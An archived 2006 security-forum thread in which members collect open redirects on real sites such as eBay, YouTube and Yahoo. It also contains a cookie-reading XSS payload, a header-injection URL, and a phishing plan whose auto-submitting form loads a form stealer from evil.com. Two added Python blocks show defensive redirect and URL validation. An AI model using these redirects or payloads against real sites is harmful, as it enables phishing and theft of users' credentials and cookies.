Sla.ckers.org
Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 05, 2006 11:01PM

that's because it's actually a variable.. not a file path

example: http://rds.yahoo.com/search/submit/ystdblahblahblahasdfjklhwkljfhakldfhasdf/*http://ha.ckers.org/

-maluc

Re: So it begins - Redirects Edition
Posted by: digi7al64
Date: October 05, 2006 11:06PM

given that i worked out you can just use

http://rds.yahoo.com/*http://ha.ckers.org/

must be anything with an asterisk is defined as a redirect

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 08, 2006 05:46AM

http://www.gamedev.net/community/forums/goto.asp?redir=http://google.com

-maluc

Re: So it begins - Redirects Edition
Posted by: wwweirdo
Date: October 10, 2006 06:05PM

I've been lurking for a while and decided to join the fun.

In honor of their recent acquisition by Google...

http://www.youtube.com/verify_age?next_url=HTTP://SLA.CKERS.ORG

This one is 2-stage... you have to click on the button.

I tried to insert some script but no luck. Nevertheless, this one is neato.

Re: So it begins - Redirects Edition
Posted by: rsnake
Date: October 10, 2006 06:13PM

Welcome wwweirdo and thanks for posting... which button do we need to click on or should we already be authenticated?

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins - Redirects Edition
Posted by: wwweirdo
Date: October 10, 2006 06:22PM

Yup - be logged in to YouTube and you'll see the following:

This video may contain content that is inappropriate for some users, as flagged by YouTube's user community.

By clicking "Confirm," you are agreeing that all videos flagged by the YouTube community will be viewable by this account.

[Confirm] <- this is the button

Re: So it begins - Redirects Edition
Posted by: rsnake
Date: October 10, 2006 06:38PM

Ah, gotcha... obscure but good find.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins - Redirects Edition
Posted by: wwweirdo
Date: October 10, 2006 06:42PM

Imagine that, an obscure post by a guy named wwweirdo.

Shocking!

Re: So it begins - Redirects Edition
Posted by: wwweirdo
Date: October 10, 2006 06:55PM

another

http://a.tribalfusion.com/h.click/FUCWKBJMNEKLHKPBRNWKCKJNRLSUQEYTQFCKKGQPTQRXIKJIGGOMHHDIKJSWRLNPIUEWKHHNMHOFEJOM/http://sla.ckers.org



Edited 1 time(s). Last edit at 10/10/2006 07:00PM by wwweirdo.

Re: So it begins - Redirects Edition
Posted by: wwweirdo
Date: October 10, 2006 07:21PM

http://directory.poland.com/link.php?url=http://sla.ckers.org

interestingly... browser url doesn't change, at least in firefox on leenucks.

anyone have msie handy?

I don't have time to see what it's doing right now, it's being demanded of me that I cook something.

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 10, 2006 08:24PM

weirdo: that's because it loads it into a frame, not a redirect .. and fortunately, into a frame that you can break out of, like so:

http://directory.poland.com/link.php?url=http://maluc.sitesled.com/xss.html?%22%3E%3Cframe%20src=about:blank%20onload=alert(document.cookie)%3E%3C/frameset%3E

the first popup, is loaded by the
<frame src="http://maluc.sitesled.com/xss.html?">
and shows that it doesn't have access to the DOM or poland.com's cookies


the injected frame event, however, does:
<frame src=about:blank onload=alert(location.host+document.cookie)>
.. there's no cookies for directory.poland.com to demonstrate, but u get the idea.

You can combine it into one frame http://directory.poland.com/link.php?url=http://maluc.sitesled.com/xss.html?%22%20onload=alert(location.host%2Bdocument.cookie)%3E%3C/frameset%3E , i just did it separate to illustrate the difference.

-maluc

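The breakout maluc describes works because link.php writes the url parameter into a frame src attribute without encoding it. As an added example (not code from the thread or from poland.com), here is that vulnerable rendering next to a hardened one that validates the scheme and attribute-encodes the value; the frameset layout, the constructed payload with its example.invalid host, and the function names are assumptions.

```python
from html import escape
from urllib.parse import urlsplit

# Constructed payload in the shape of the one posted in the thread, already
# percent-decoded: the quote closes the src attribute, then a second <frame>
# with an onload handler runs in the framing page's origin.
INJECTED = ('http://example.invalid/xss.html?"><frame src=about:blank '
            'onload=alert(document.cookie)></frameset>')

TEMPLATE = '<frameset rows="60,*"><frame src="/banner"><frame src="{}"></frameset>'


def render_frameset_vulnerable(url: str) -> str:
    """The bug: the url parameter is written straight into the attribute."""
    return TEMPLATE.format(url)


def is_http_url(url: str) -> bool:
    """Only http(s) URLs with a host may be framed; javascript: etc. are refused."""
    parts = urlsplit(url)
    return parts.scheme in ("http", "https") and bool(parts.hostname)


def render_frameset_hardened(url: str) -> str:
    """Validate the scheme, then attribute-encode so that '"', '<' and '>'
    become entities and cannot terminate the attribute or open a new tag."""
    if not is_http_url(url):
        url = "about:blank"
    return TEMPLATE.format(escape(url, quote=True))


def frame_count(html_text: str) -> int:
    """Number of <frame tags in the output; a third one means the injection landed."""
    return html_text.lower().count("<frame ")
```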
Re: So it begins - Redirects Edition
Posted by: Ghozt
Date: October 11, 2006 10:38PM

oops, wrong thread.



Edited 1 time(s). Last edit at 10/11/2006 10:39PM by Ghozt.

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 12, 2006 03:51AM

http://www2.warnerbros.com/event.ng/Type=click&Redirect=http:%2F%2Fwww.asdf.com

-maluc

Re: So it begins - Redirects Edition
Posted by: rsnake
Date: October 12, 2006 11:09AM

Maluc are you already testing these for HTTP Response splitting too? I don't want to do double duty on your finds if you are already looking for them.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 12, 2006 11:22AM

oh.. i didn't look for that one, because i was lazy .. and i'd bet that it's vulnerable to it.

But generally i do check now.. so you could skip them if you want. However, i still don't fully understand all the variations and why. I just pieced it together by looking at the ones you posted.

-maluc

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 12, 2006 11:29AM

actually, can you take a look at this one though? it only seems to allow 10 characters to be injected into the header..

-maluc

Re: So it begins - Redirects Edition
Posted by: rsnake
Date: October 12, 2006 12:12PM

You're absolutely right, this isn't exploitable for the sole reason that there just isn't enough data, although you can do annoying things like set cookies if for some reason that was helpful on that cname on that domain (ww2.):

http://www2.warnerbros.com/event.ng/Type=click&Redirect=%0ASet-Cookie:blah=blah

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 13, 2006 05:55PM

http://cgi1.ebay.it/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://google.com/

i can't take credit for this.. i found it thanks to a phishing email i received. Seems to work for all their TLDs .com .it etc .. just goes to show how dangerous redirects can be. Someone who thinks they know how to check if it's real or not by looking at the domain (i.e. http //ebay.com.sk3dn.ru/ is fishy) .. will be fooled along with the totally clueless ones.
http //cgi1.ebay.it/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://200.72.242.999/mambo/cache/04110012600115000800008400061000640006100126/SignIncopartnerId=2pUserId=siteid=0pageType=pa1=i1=bshowgif=UsingSSL=ru=pp=pa2=errmsg=runame=ruparams=ruproduct=sid=favoritenav=confirm=ebxPageType=existingEmail=isCheckout=migrateVisitor.htm

looks pretty legit to a normal user. (changing the .999 to .44 will give you the live site)

-maluc

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 13, 2006 06:22PM

amusingly, this would pass their 'spot a fake' tutorial..

Quote

Legitimate eBay Web Addresses
To determine if the Web address in your browser is a real eBay address, look for
".ebay.com" immediately before the first "/". In the below examples, notice that
there must be a "." before eBay.com for the address to be legitimate.

-maluc

Re: So it begins - Redirects Edition
Posted by: Ghozt
Date: October 13, 2006 06:37PM

@ maluc: Once it redirects, it doesn't pass the "Spot a fake" tutorial, because it shows the IP/mambo.

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 13, 2006 07:38PM

You're correct, but getting them to click the link from their email is half the battle. Their mission may not be to just do the stereotypical fake login page.. but instead make use of an XSS hole on ebay.com that works for POST only. They could for example:

1.)Send them an email with:
http //cgi1.ebay.fr/aw-cgi/ebayISAPI.dll?RedirectEnter&partner=25047&loc=http://evil.com
2.)Redirect them back to ebay using the POST xss
<form name="postxss" method="post" action="http://ebay.com/login.asp">
<input type="hidden" name="vulnerable" value='"><script src=http://evil.com/formstealer.js>' />
<input type="submit" />
</form>
<script type="text/javascript">
postxss.submit();
</script>

They click a valid ebay link in their email, and they see a valid ebay link at the end. Normally a POST xss would not be able to be distributed by email without the use of a redirect like so.. or an obviously fake domain
http //ebay.com.ebayverify.cz

-maluc



Edited 1 time(s). Last edit at 10/13/2006 07:41PM by maluc.

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 14, 2006 02:33AM

http://www.yellowpages.com/sp/exittracking/?&path=http%3A//www.asdf.com

http://www.switchboard.com/bin/cgiredir.dll?ID=515&URL=http://www.asdf.com

-maluc

Re: So it begins - Redirects Edition
Posted by: unsticky
Date: October 19, 2006 02:31AM

[www.theonion.com]

target=base64 encoded 'http://ha.ckers.org'

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 19, 2006 04:00AM

heh, don't see too many base64 in use .. unfortunately it goes to a 'leaving website' page for 10 seconds before redirecting.. if you don't already have the 'premercial' cookie

but fortunately.. base64 and other encoding often gets overlooked for the filtering. so it left 3 points of injection

-maluc

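As an added example (not code from the thread or from any of the sites named in it), a server-side check for a redirect parameter that covers the cases raised above: RSnake's %0ASet-Cookie header injection against the warnerbros Redirect parameter, the base64-encoded target unsticky found, which maluc notes often slips past filtering, and percent-encoded or scheme-relative targets. ALLOWED_HOSTS, the function names and the example hosts are assumptions.

```python
import base64
import binascii
from urllib.parse import unquote, urlsplit

# Constructed allow-list: the only external hosts this application redirects to.
ALLOWED_HOSTS = {"www.example.com", "example.com"}


def decode_target(raw: str, base64_encoded: bool = False) -> str:
    """Percent-decode the parameter and, where the application transports it
    base64-encoded (as the onion's target= did), decode that too. Decoding
    happens before validation so the encoding cannot hide the real target."""
    value = unquote(raw)
    if base64_encoded:
        try:
            value = base64.b64decode(value, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return ""
    return value


def safe_redirect_target(raw: str, base64_encoded: bool = False) -> str:
    """Return a Location value that is safe to emit, or '/' when the input fails."""
    target = decode_target(raw, base64_encoded)
    # Response splitting: a CR or LF would end the Location header and let the
    # request append its own headers, e.g. %0ASet-Cookie:blah=blah.
    if not target or "\r" in target or "\n" in target:
        return "/"
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        # Same-site path: exactly one leading '/', since '//host' and '/\host'
        # are read by browsers as scheme-relative references to another host.
        if target.startswith("/") and not target.startswith(("//", "/\\")):
            return target
        return "/"
    # Absolute URL: http(s) only, host on the allow-list. .hostname strips any
    # userinfo trick such as http://www.example.com@ha.ckers.org/ and lowercases.
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return target
    return "/"
```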
Re: So it begins - Redirects Edition
Posted by: nrg
Date: October 20, 2006 10:12AM

maluc most tgp sites use base64 on the thumbnails when not using plain url, actually most tgp sites could be in this topic lol (and many might be good for HTTP Response splitting).

now one more redirection: http://shareup.com/getfile.php?v=8527&file=http%3A%2F%2Fwww.google.com

is this good for anything besides phishing?
also how can i see how is the redirection being done (see if its a 301 redirect or something like that)?

ty : )

Re: So it begins - Redirects Edition
Posted by: rsnake
Date: October 20, 2006 10:31AM

nrg... I use burp proxy personally... it's by far the most useful tool in my haX0ring collection. Just adjust the settings to watch both inbound and outbound connections and allow all types (not just text) and you'll see everything your browser sees in slow motion. It's super helpful, especially if you want to test alternate headers but don't want to have to build a custom flash file each time. Use it, love it.

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 20, 2006 03:10PM

I asked the same question about the uses for phishing towards the beginning of this thread.. which RSnake answered well:
Quote

Well, if they are vulnerable to response splitting you get the side advantage of also getting some XSS out of it, but you're essentially right. Redirection is mostly for phishing, and mostly it's not good even for referrer masking as most browsers keep the referrer through 301 redirection of the original page, not the page that does the redirection itself.

However, for a limited time only (and in just 3 easy payments of 29.99) they're also useful for the IE6/IE7 bug http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/ which allows you to pull content remotely, from any domain, via javascript - with the use of any open 302 redirect that doesn't require you to start with http://. In other words, throws the Same Origin Policy out the window.

And as RSnake also pointed out on the ha.ckers blog.. that globally disables the CSRF protections of tokens. Once this is patched however, they're mostly just good for phishing or response splitting or javascript:alert() type XSS. And referrer masking.

I too am in love with burp proxy.. although i generally use firefox's Live HTTP Headers extension instead, for things like viewing redirect types and paths. A personal preference..

-maluc

Re: So it begins - Redirects Edition
Posted by: rsnake
Date: October 20, 2006 07:15PM

Maluc, I owe you a beer sometime. Just accept it as a gift from me to you cuz you rock the house.

Anyway, I thought this one was amusing: https://www.scanalert.com/Link.sa?url=http://www.yahoo.com

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 20, 2006 08:03PM

lol, i'm not positive what i did to deserve it this time - but i've said before that i'm never one to turn down free liquor ^^.

and heh, always amusing to see security companies with security issues. i'm writing a mhtmlAPI.js right now, i'll be sure to have it run off scanalert..

-maluc

Re: So it begins - Redirects Edition
Posted by: maluc
Date: October 23, 2006 10:21PM

Well after a great deal of testing.. if you want to solely use javascript for the mhtml exploiting, it requires more than just an open redirect by itself. needs one of the following to be true:

1. an open redirect, plus an XSS (persistent/reflexive) on the same domain.
2. an open redirect on your own domain
3. an open redirect susceptible to response splitting
4. other ways i'm too tired to think of

You could also use a proxy (like Google Translator) but that would defeat the purpose of CSRF as it'll be a Google bot that requests the page, not the victim.

Luckily, it's not tough to find an XSS hole in half of the domains in this thread. I found a persistent XSS in tinyurl which i'll be using once i find the time to finish this API for it. hopefully some time tomorrow

Edit: added #3 which RSnake pointed out is also possible

-maluc



Edited 1 time(s). Last edit at 10/23/2006 11:31PM by maluc.
